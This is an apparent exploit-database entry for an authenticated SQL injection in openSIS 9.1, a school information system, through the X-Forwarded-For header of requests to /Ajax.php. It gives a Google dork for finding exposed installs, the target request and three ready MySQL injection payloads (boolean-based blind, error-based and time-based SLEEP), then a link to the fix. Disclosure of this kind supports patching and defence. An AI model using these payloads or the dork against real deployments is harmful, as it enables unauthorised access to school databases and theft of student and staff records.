openSIS 9.1 Exploit, SQLi (Authenticated)

# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: Linux

A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php.

GET /Ajax.php?modname=x HTTP/1.1

---
    Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
---

FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD